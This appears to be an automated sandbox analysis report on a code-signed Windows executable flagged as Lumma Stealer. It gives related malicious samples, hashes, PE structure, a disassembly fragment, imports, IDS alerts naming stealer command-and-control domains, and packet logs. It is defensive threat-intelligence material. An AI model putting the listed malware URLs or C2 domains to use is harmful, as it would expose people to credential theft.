steamcommunity.com | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
steamcommunity.com | b222.txt.ps1 | malicious | LummaC
• 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Stealc, Vidar
• 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Stealc, Vidar
• 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Stealc, Vidar
• 104.102.49.254
steamcommunity.com | Google_Chrome.exe | malicious | LummaC
• 104.102.49.254
steamcommunity.com | https://finalstepgetshere.com/uploads/beta111.zip | malicious | LummaC, Go Injector, LummaC Stealer
• 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Stealc, Vidar
• 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC
• 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name (context IP follows each row as a bullet)
CLOUDFLARENETUS | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 172.67.140.92
CLOUDFLARENETUS | l5pPoBu9i3.exe | malicious | Unknown
• 172.67.178.253
CLOUDFLARENETUS | z92BankPayment38_735.exe | malicious | AgentTesla
• 104.26.12.205
CLOUDFLARENETUS | http://www.freemangas.com | malicious | Unknown
• 172.67.74.221
CLOUDFLARENETUS | caZq8MavwF.exe | malicious | Unknown
• 172.67.178.253
CLOUDFLARENETUS | http://freemangas.com | malicious | Unknown
• 104.26.11.241
CLOUDFLARENETUS | 72LZTFDM58.exe | malicious | Unknown
• 172.67.178.253
CLOUDFLARENETUS | https://app.glorify.com/file/1193241?format=90 | malicious | Unknown
• 188.114.96.3
CLOUDFLARENETUS | SHIPPING_DOCUMENTS.VBS.vbs | malicious | FormBook
• 172.67.181.150
CLOUDFLARENETUS | ODzRw7AnvO.exe | malicious | Unknown
• 104.21.67.172
AKAMAI-ASUS | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
AKAMAI-ASUS | eEu5xPVQUo.exe | malicious | Rhysida
• 96.17.64.189
AKAMAI-ASUS | 62-3590.pdf | malicious | Unknown
• 96.17.64.189
AKAMAI-ASUS | DV2mrnfX2d.exe | malicious | Rhysida
• 23.56.162.185
AKAMAI-ASUS | eEu5xPVQUo.exe | malicious | Rhysida
• 96.17.64.189
AKAMAI-ASUS | Axactor Microsoft - Introduksjonsm#U00f8te.msg | malicious | EvilProxy
• 2.19.126.151
AKAMAI-ASUS | Axactor Microsoft - Introduksjonsm#U00f8te.msg | malicious | EvilProxy
• 104.102.21.248
AKAMAI-ASUS | 563299efce875400a8d9b44b96597c8e-sample (1).zip | malicious | Unknown
• 104.118.8.10
AKAMAI-ASUS | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
AKAMAI-ASUS | b222.txt.ps1 | malicious | LummaC
• 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name (context IPs follow each row as bullets)
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
• 172.67.209.193
• 172.67.188.210
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• 104.102.49.254
• 172.67.209.193
• 172.67.188.210
a0e9f5d64349fb13191bc781f81f42e1 | FA_41_09_2024_.PDF | malicious | Unknown
• 104.102.49.254
• 172.67.209.193
• 172.67.188.210
a0e9f5d64349fb13191bc781f81f42e1 | b222.txt.ps1 | malicious | LummaC
• 104.102.49.254
• 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                Google_Chrome.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                No context
                                                                                                                                                                No created / dropped files found
                                                                                                                                                                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                Entropy (8bit):5.755978701725458
                                                                                                                                                                TrID:
                                                                                                                                                                • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                File name:BW4pTs1x3V.exe
                                                                                                                                                                File size:13'565'176 bytes
                                                                                                                                                                MD5:3677ebc159e92251f19020e9ab4b62ad
                                                                                                                                                                SHA1:561483bb3f3ae9d384d21670f184a7c3fc9cf9c5
                                                                                                                                                                SHA256:2fad7f1752f7c3f57c038bf09359093471523172c08572117eaba2556e859509
                                                                                                                                                                SHA512:1daa3a77bc77b422678fdb65362d1dde1d8f1cce20b68a25b84c79a11abc7e06e8cebf98a7cb0f957f612b6047c9e76c53e18f458288d633efcb35dcd0a718a6
                                                                                                                                                                SSDEEP:98304:IdYu0vXx5GmAxBvSmSSxBREz5A1XVafXFP+JgIX:IdmXx5GmSkm7xByz5wRJgIX
                                                                                                                                                                TLSH:A6D62843E8A149E4C19AD13489369616BA60BC5C8B3037D72B64F7693F36FC0AE7C758
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..S....................@.............................`.......q....`... ............................
                                                                                                                                                                Icon Hash:72d280daeaea9282
                                                                                                                                                                Entrypoint:0x1400014c0
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:true
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                TLS Callbacks:0x40533f00, 0x1, 0x40533ed0, 0x1, 0x40537970, 0x1
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:6
                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                File Version Major:6
                                                                                                                                                                File Version Minor:1
                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                Import Hash:4a438adb9d59c004dab9ec35016a1405
                                                                                                                                                                Signature Valid:true
                                                                                                                                                                Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                                                                Signature Validation Error:The operation completed successfully
                                                                                                                                                                Error Number:0
                                                                                                                                                                Not Before, Not After
                                                                                                                                                                • 09/09/2024 05:06:13 09/09/2025 05:06:12
                                                                                                                                                                Subject Chain
                                                                                                                                                                • CN="Guizhou Sixuanda Technology Co., Ltd.", O="Guizhou Sixuanda Technology Co., Ltd.", L=Guiyang, S=Guizhou, C=CN, SERIALNUMBER=91520100MA6DNNXK11, OID.1.3.6.1.4.1.311.60.2.1.1=Guiyang, OID.1.3.6.1.4.1.311.60.2.1.2=Guizhou, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                                                                                                                                                Version:3
                                                                                                                                                                Thumbprint MD5:62A1343435FC5131E11FA8C871BB3A1B
                                                                                                                                                                Thumbprint SHA-1:A3AFF46C5F8E2A1F750C570698B864E75553E61F
                                                                                                                                                                Thumbprint SHA-256:87D45B86DFCC84C5EF8338026C26F34935DBAA383A7DD583F48675AF77C957A4
                                                                                                                                                                Serial:332576FE101609502C23F70055B4A3BE
                                                                                                                                                                Instruction
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                dec eax
                                                                                                                                                                mov eax, dword ptr [00C7E4B5h]
                                                                                                                                                                mov dword ptr [eax], 00000001h
                                                                                                                                                                call 00007F9C91274F3Fh
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                nop dword ptr [eax]
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                dec eax
                                                                                                                                                                mov eax, dword ptr [00C7E495h]
                                                                                                                                                                mov dword ptr [eax], 00000000h
                                                                                                                                                                call 00007F9C91274F1Fh
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                nop dword ptr [eax]
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                call 00007F9C917B2A5Ch
                                                                                                                                                                dec eax
                                                                                                                                                                test eax, eax
                                                                                                                                                                sete al
                                                                                                                                                                movzx eax, al
                                                                                                                                                                neg eax
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                dec eax
                                                                                                                                                                lea ecx, dword ptr [00000009h]
                                                                                                                                                                jmp 00007F9C91275259h
                                                                                                                                                                nop dword ptr [eax+00h]
                                                                                                                                                                ret
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                jmp dword ptr [eax]
                                                                                                                                                                inc edi
                                                                                                                                                                outsd
                                                                                                                                                                and byte ptr [edx+75h], ah
                                                                                                                                                                imul ebp, dword ptr [esp+20h], 203A4449h
                                                                                                                                                                and dl, byte ptr [ecx+57h]
                                                                                                                                                                insb
                                                                                                                                                                imul esi, dword ptr [eax+ebx*2], 7745346Eh
                                                                                                                                                                dec ecx
                                                                                                                                                                jno 00007F9C912752ECh
                                                                                                                                                                push esp
                                                                                                                                                                push 6B767654h
push 3452352Fh
pop ecx
xor dword ptr [eax+49h], ebp
dec edi
xor dword ptr [ecx+35h], edx
jnc 00007F9C912752C6h
jp 00007F9C912752E3h
jo 00007F9C912752DAh
dec eax
jnc 00007F9C912752DCh
das
cmp dword ptr [ecx+41h], esi
je 00007F9C912752D4h
jp 00007F9C912752E5h
push eax
je 00007F9C912752F3h
jo 00007F9C912752B8h
imul esi, dword ptr [ecx], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xcef000 | 0x4e | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xcf0000 | 0x1438 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcf4000 | 0x33f2f | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xc81000 | 0x1aa54 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xced400 | 0x28f8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd28000 | 0x1d8b4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc7f2e0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xcf048c | 0x450 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x53e4a0 | 0x53e600 | 394db365a9f376f5c9b299a89ab25a15 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x540000 | 0x566b0 | 0x56800 | 1b5e5b16986ac232a6a53b48fcef5344 | False | 0.34253635296242774 | dBase III DBT, version number 0, next free block index 10, 1st item "6kDSMZOvjsQ+0=" | 4.645704544292621 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x597000 | 0x6e9130 | 0x6e9200 | 21aaeaf462336b9dda8d6b9047ad89ae | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata | 0xc81000 | 0x1aa54 | 0x1ac00 | d2b0dbe0d7214d404412ddbeb569c811 | False | 0.40415997371495327 | data | 5.637791091275255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata | 0xc9c000 | 0xc60 | 0xe00 | 1968239f00fc167752b363921b6f7862 | False | 0.2603236607142857 | data | 4.006709114879526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss | 0xc9d000 | 0x51460 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0xcef000 | 0x4e | 0x200 | eda511bdddf784c55171ae58ef7651e0 | False | 0.1328125 | data | 0.8426867641107897 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata | 0xcf0000 | 0x1438 | 0x1600 | 4ec2e06f21480c761e0837d644ba2871 | False | 0.2956321022727273 | data | 4.187655253188815 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0xcf2000 | 0x70 | 0x200 | e5fdc731709deadaef06b908907d36c5 | False | 0.083984375 | data | 0.4565349337112152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xcf3000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xcf4000 | 0x33f2f | 0x34000 | 1867f5914e50b43c6feb6ebe36589329 | False | 0.11912184495192307 | data | 4.062097483566672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0xd28000 | 0x1d8b4 | 0x1da00 | b5504400ca42ae08420f2866c869a5df | False | 0.22093387394514769 | data | 5.445753000800914 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcf4168 | 0x3334c | Device independent bitmap graphic, 225 x 450 x 32, image size 202500 | | | 0.11429388767044912
RT_GROUP_ICON | 0xd274b4 | 0x14 | data | | | 1.2
RT_VERSION | 0xd274c8 | 0x340 | data | English | United States | 0.4230769230769231
RT_MANIFEST | 0xd27808 | 0x727 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4265428727471327
DLL | Import
KERNEL32.dll | AddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
msvcrt.dll | ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen
Name | Ordinal | Address
_cgo_dummy_export | 1 | 0x140ced690
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-02T14:55:29.335432+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49716 | 172.67.188.210 | 443 | TCP
2024-10-02T14:55:29.335432+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49716 | 172.67.188.210 | 443 | TCP
2024-10-02T14:55:29.359107+0200 | 2056164 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) | 1 | 192.168.2.8 | 57693 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.371418+0200 | 2056162 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) | 1 | 192.168.2.8 | 49364 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.383142+0200 | 2056160 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) | 1 | 192.168.2.8 | 59759 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.464436+0200 | 2056158 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) | 1 | 192.168.2.8 | 59623 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.551416+0200 | 2056156 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) | 1 | 192.168.2.8 | 60353 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.563128+0200 | 2056154 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) | 1 | 192.168.2.8 | 54180 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.573766+0200 | 2056152 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) | 1 | 192.168.2.8 | 63806 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.584440+0200 | 2056150 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) | 1 | 192.168.2.8 | 64498 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:32.267885+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49718 | 172.67.209.193 | 443 | TCP
2024-10-02T14:55:32.267885+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49718 | 172.67.209.193 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 14:55:28.190203905 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:28.190253019 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:28.190323114 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:28.193065882 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:28.193083048 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:28.663266897 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:28.663358927 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:28.718578100 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:28.718607903 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:28.718962908 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:28.759210110 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:28.875998974 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:28.876028061 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:28.876311064 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:29.335443020 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:29.335685015 CEST | 443 | 49716 | 172.67.188.210 | 192.168.2.8
Oct 2, 2024 14:55:29.335892916 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
Oct 2, 2024 14:55:29.336931944 CEST | 49716 | 443 | 192.168.2.8 | 172.67.188.210
